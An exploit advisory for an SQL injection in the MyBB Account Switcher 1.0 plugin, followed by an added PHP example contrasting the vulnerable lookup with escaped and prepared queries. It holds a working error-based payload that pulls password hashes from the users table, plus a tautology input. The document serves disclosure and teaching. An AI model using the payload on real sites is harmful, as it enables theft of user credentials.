# Exploit Title: MyBB Plugin Account Switcher <= 1.0 SQL injection
# Date: 19/01/2013
# Exploit Author: Kallimero
# Vendor Homepage: http://mods.mybb.com/view/account-switcher-1-0
# Version: 1.0
# Tested on: Debian

Vulnz
========

The MyBB plugin named Account Switcher is vulnerable to an SQL injection.

---------------[sitemap.php]---------------
<?php
if($mybb->input['action'] == "as_attach" && $mybb->input['select'] == "attachme" && $mybb->request_method == "post")
{
    verify_post_check($mybb->input['my_post_key']);

    // check if current user is already attached
    if($mybb->user['as_uid'] != "0")
        error($lang->as_alreadyattached);

    // validate input
    $select   = htmlspecialchars_uni($mybb->input['select']);
    $username = htmlspecialchars_uni($mybb->input['username']);
    $password = htmlspecialchars_uni($mybb->input['password']);

    // get the target (username is HTML-escaped only, then interpolated into the WHERE clause)
    $target = $db->fetch_array($db->simple_select("users", "uid, usergroup", "username='{$username}'"));
?>
---------------[sitemap.php]---------------

htmlspecialchars_uni() does not really sanitize the input for SQL: it HTML-escapes a few characters but leaves the single quote alone. Therefore we can inject SQL code through the username field.

Sorry, it's not a tricky SQL injection this time...

Here is the PoC (error-based):

username=1' and (select 1 from (select count(*),concat((select password FROM mybb_users LIMIT 0,1 ),0x7e, floor(rand(0)*3)) as e from information_schema.tables group by e) a)-- -

How to fix?
============

A simple $db->escape_string() on the vulnerable fields would fix it. htmlspecialchars() and friends do not protect you against SQL injection. Real functions do that job well and are made for it ($db->escape_string() in MyBB).

Thanks
=========

All hwc members: Necromoine, fr0g, AppleSt0rm, St0rn, Zhyar, k3nz0, gr4ph0s.

Please visit: http://hwc-crew.org/
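To make the fix section concrete, here is an added example (not part of the advisory and not the plugin's code) that puts the plugin's lookup pattern beside two corrected forms. It runs offline against an in-memory SQLite database through PDO, so MyBB's own $db wrapper is not available: the role of $db->escape_string() is played by PDO::quote() (which, unlike escape_string(), also adds the surrounding quotes), and a prepared statement is shown as the cleaner alternative. The htmlspecialchars_uni_like() function is re-implemented after MyBB's inc/functions.php and should be treated as an approximation; the table rows and the input value are constructed for the demonstration.

```php
<?php
// Added example: why HTML-escaping does not stop SQL injection, and two correct lookups.
// Uses SQLite via PDO so it runs without a MyBB install (requires the pdo_sqlite extension).

// Approximation of MyBB's htmlspecialchars_uni(): escapes &, <, > and " but NOT the
// single quote, which is exactly the character that closes an SQL string literal.
function htmlspecialchars_uni_like(string $message): string
{
    $message = preg_replace("#&(?!\#[0-9]+;)#si", "&amp;", $message);
    $message = str_replace("<", "&lt;", $message);
    $message = str_replace(">", "&gt;", $message);
    $message = str_replace("\"", "&quot;", $message);
    return $message;
}

// Constructed sample table standing in for mybb_users.
function make_db(): PDO
{
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec("CREATE TABLE users (uid INTEGER PRIMARY KEY, username TEXT NOT NULL, usergroup INTEGER NOT NULL)");
    $pdo->exec("INSERT INTO users (uid, username, usergroup) VALUES (1, 'admin', 4), (2, 'alice', 2)");
    return $pdo;
}

// The plugin's pattern: HTML-escape, then interpolate straight into the WHERE clause.
function lookup_vulnerable(PDO $pdo, string $input): array
{
    $username = htmlspecialchars_uni_like($input);
    $sql = "SELECT uid, usergroup FROM users WHERE username='{$username}'";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Fix 1: SQL-escape the value before interpolating. In MyBB this is
// $db->escape_string($username) inside the quotes; PDO::quote() here returns the
// value already wrapped in quotes, so the literal quotes are dropped from the SQL.
function lookup_escaped(PDO $pdo, string $input): array
{
    $username = $pdo->quote($input);
    $sql = "SELECT uid, usergroup FROM users WHERE username={$username}";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Fix 2: a parameterised query, so no string building is involved at all.
function lookup_prepared(PDO $pdo, string $input): array
{
    $stmt = $pdo->prepare("SELECT uid, usergroup FROM users WHERE username = ?");
    $stmt->execute([$input]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

$pdo = make_db();
// Constructed input: a value containing a single quote, as an attacker would supply
// in the username field. htmlspecialchars_uni_like() passes the quote through unchanged.
$input = "x' OR '1'='1";

printf("after htmlspecialchars_uni_like: %s\n", htmlspecialchars_uni_like($input));
printf("vulnerable lookup: %d row(s)\n", count(lookup_vulnerable($pdo, $input)));
printf("escaped lookup:    %d row(s)\n", count(lookup_escaped($pdo, $input)));
printf("prepared lookup:   %d row(s)\n", count(lookup_prepared($pdo, $input)));
```

Run with `php example.php`. The vulnerable lookup returns every row in the table, because the quote in the input terminates the string literal and the rest of the value becomes part of the WHERE clause; both corrected lookups return no rows, since no user is literally named `x' OR '1'='1`. In the plugin the equivalent one-line change is `"username='" . $db->escape_string($mybb->input['username']) . "'"` in the simple_select() condition; htmlspecialchars_uni() remains appropriate only where the value is later rendered as HTML.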